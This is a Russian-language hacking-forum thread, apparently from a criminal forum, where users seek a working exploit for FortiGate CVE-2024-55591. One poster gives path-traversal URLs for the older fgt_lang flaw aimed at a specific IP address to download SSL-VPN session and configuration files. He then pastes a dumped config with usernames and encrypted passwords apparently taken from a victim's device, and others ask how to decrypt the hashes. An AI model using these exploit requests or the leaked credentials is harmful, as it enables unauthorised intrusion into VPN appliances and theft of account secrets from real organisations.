[Forti] CVE-2024-55591 есть у кого рабочий сплойт?

[Wstress]

ну нормально накидал - а главное даже блек не предъявишь кстати вообще гитхаб + сатошидиск = 99% кидок

тебе попадался тот самый 1%
или и то не доказано

 

[3ToN]

Столкнулся с такой же проблемой, нашел решение ?

к сожалению, пока хз как расшифровать такой хеш

 

[frolti]

В общем и целом, при работе с фортиками вам всегда нужно дотянуться до конфига. Остальное накуй не нужно.
Приведу пример с экспом 18го года, помните такой? /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
Мало кто знает как вытянуть конфиг из него. Конфиг хранится в нескольких файлах, названия могут меняться но список их не велик. Методом перебора находим конфиги, и соблюдаем длинну строки. Например
Сессии: https://115.231.65.42:8443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
Конфиг https://115.231.65.42:8443/remote/fgt_lang?lang=../..////data/./config//sys_vd_root+root.conf.gz
Но т.к. символ + в урле конфига, енкодим его в 115.231.65.42:8443/remote/fgt_lang?lang=../..////data/./config//sys_vd_root%2Broot.conf.gz скачиваем, анзипаем и парсим. Профит

config user local
    edit "guest"
        set type password
        set passwd-time 2024-12-16 22:25:07
        set passwd ENC YfyWn0CcKGCuinT08B9PAiRBaqGRQ2SWTvsWdCFvzHcqKVwBz24RIi7+pfn+BEqwoRAAlanmoMg6HRAymTa3AkSDa4GQcE4EI3fnsP1Tr9z3AZ9+FtaYoj3P1HPVjt6o/YMAuSUS1G2F0Gep93MF9YVk2LIhze/juYtJwi8lYmyayhFKmhorGoXB0W41Jju4jU4qiw==
    next
    edit "HN1"
        set type password
        set passwd-time 2021-06-14 15:39:06
        set passwd ENC Crl9G7VPStRvP+NjNoILvnC6S75lpupUZWBVLnfWOwigopsM41lpidY6RQuSljAogl9XzYcco+5AaljUARcfz4K7SGN/TPKsA2BXMhvPKJbNkdK1mS4lgGXCca9OnNY03+Ziq5Sm1P0upCuFmDc85KO/ID6l90gV+NlNoKWvbpYz90R7CyOFcXkbo3K65NPqESEjgQ==
    next
    edit "复制HN1"
        set type password
        set passwd-time 2021-11-29 17:37:32
        set passwd ENC hiL+xhAI8n42ycawZqhJIPvQXjzKY7QMZ83SUKuAy/3cKbB2Gwu52VemSGK31mqZ/WsG8i7LpzQpYkDL9mc25GjpcfwUUVxVUtEFo5+vqDb/2kUlKz5urp2CrF9wU4EBZIQQJkWBMRdmt+OzV7dMxeoO252hCJ1K94H4aJyuBSoUUQoIbElqssPt1bFkU6ghfqjWaw==
    next
end

А сессий нету. Половина таких были не отработаны по причине, что сессий нет, но в конфиге были юзеры

не получается розархивить. что только не пробовал - не выходит. file.conf.gz : not in gzip format . кто-то сталкивался ???